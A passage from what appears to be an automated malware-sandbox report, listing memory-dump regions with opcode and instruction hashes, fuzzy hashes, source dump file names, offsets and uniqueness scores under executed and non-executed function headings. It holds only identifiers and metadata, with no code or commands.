                  • Instruction ID: 1147ef6b58d67dd94561473555dcc179821574f5c7313f2eacb1bca1b6a71d63
                  • Opcode Fuzzy Hash: ca3f7c519e96159a28ef77e70662954c3f93d931a60b4f853ff3a0168477c374
                  • Instruction Fuzzy Hash: C8415C7054DBC48FD7B6EB289454B9ABBF0EB9A301F05499FD48CC7192DA349888CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.529653632.00000000068E1000.00000040.00000001.sdmp, Offset: 068E1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 617210bf5319f1e4f3f9e0115776587d6749cbc6103670741061ac0b37f6932a
                  • Instruction ID: 1783f5d3a2027307160fe01ca2cafb34687d432ef6eed5706ac84e2e12eb6cb3
                  • Opcode Fuzzy Hash: 617210bf5319f1e4f3f9e0115776587d6749cbc6103670741061ac0b37f6932a
                  • Instruction Fuzzy Hash: F2418A7050DBC48FD7B6EB2894547967BF0EF5A301F05499FD48CC7292DA389888CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.529653632.00000000068E1000.00000040.00000001.sdmp, Offset: 068E1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ba6d85588dfb9f1349bd2723e241a224fcf7b97d3a70ef3604b56bee460c4f20
                  • Instruction ID: bba1a3bf804e444bf940d5d33fa6759d4a3fad5854435d1c95916f9c70c7ccde
                  • Opcode Fuzzy Hash: ba6d85588dfb9f1349bd2723e241a224fcf7b97d3a70ef3604b56bee460c4f20
                  • Instruction Fuzzy Hash: 71214F6140E7C44FC7139B3898656907FB19F2B200B0E49DBD4C8CF1E3E41A995AC7A3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.529653632.00000000068E1000.00000040.00000001.sdmp, Offset: 068E1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9c13a6da4e4d77e09de50645eccfda45dc81fbed54509a4e83d3d156f305fc5
                  • Instruction ID: d65600662a8f50cb28a7a78cb4534ac868394a26e09ad206d1102c9057495ad3
                  • Opcode Fuzzy Hash: f9c13a6da4e4d77e09de50645eccfda45dc81fbed54509a4e83d3d156f305fc5
                  • Instruction Fuzzy Hash: 9B017A2150EBC44FC757AB28A8226107FB49F97200F0A45DBD888CB1E3D5289C4DCB63
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.529653632.00000000068E1000.00000040.00000001.sdmp, Offset: 068E1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 158351d694cc10c5f25ca4eb63e94f015aed4d39b113b3c3fab98fb6b8f06868
                  • Instruction ID: b4432c6b8ee1e9f9f16bb7bf92043e19dcb1704c477383eab4caacd57de85c73
                  • Opcode Fuzzy Hash: 158351d694cc10c5f25ca4eb63e94f015aed4d39b113b3c3fab98fb6b8f06868
                  • Instruction Fuzzy Hash: 6901682100E7C44FC7679B389865A50BFB0AF57200F1A85DBD888CB1E3D529984DC7A3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.529653632.00000000068E1000.00000040.00000001.sdmp, Offset: 068E1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c096a9887029ceeb54b94599836a02d6797bdf2ad495392db0f518a8c58d93e
                  • Instruction ID: 820819328d04f7149371ffdeaca0838161e93450c1595474807ea23a8b22f6db
                  • Opcode Fuzzy Hash: 3c096a9887029ceeb54b94599836a02d6797bdf2ad495392db0f518a8c58d93e
                  • Instruction Fuzzy Hash: 9A11C22140EBC84FC7539B68A861A907FB0AF17200F0A05D7D4C8CF1E3D5189D48C7A3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.529653632.00000000068E1000.00000040.00000001.sdmp, Offset: 068E1000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 90b3e98ea7b996ba0302702d731403e43e7795193ee7ed901a14dc9ba835939f
                  • Instruction ID: a305f8128816cbf90e5b3c396329b4cba61502a451c1adbc6e1bf06010801851
                  • Opcode Fuzzy Hash: 90b3e98ea7b996ba0302702d731403e43e7795193ee7ed901a14dc9ba835939f
                  • Instruction Fuzzy Hash: 1511452154E7C44FC7539778A8A56903FB09F17204B1A44DBD4C8CF1A3D5599C5DC763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Executed Functions

                  Memory Dump Source
                  • Source File: 00000004.00000003.415330442.00000000024F0000.00000010.00000001.sdmp, Offset: 024F0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction ID: 68fc34066cde21c3c93ff8a4bce96e257095541e23d76443386455aa6adc1e9b
                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.415330442.00000000024F0000.00000010.00000001.sdmp, Offset: 024F0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction ID: 68fc34066cde21c3c93ff8a4bce96e257095541e23d76443386455aa6adc1e9b
                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.415330442.00000000024F0000.00000010.00000001.sdmp, Offset: 024F0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction ID: 68fc34066cde21c3c93ff8a4bce96e257095541e23d76443386455aa6adc1e9b
                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.415330442.00000000024F0000.00000010.00000001.sdmp, Offset: 024F0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction ID: 68fc34066cde21c3c93ff8a4bce96e257095541e23d76443386455aa6adc1e9b
                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000003.415330442.00000000024F0000.00000010.00000001.sdmp, Offset: 024F0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction ID: 68fc34066cde21c3c93ff8a4bce96e257095541e23d76443386455aa6adc1e9b
                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions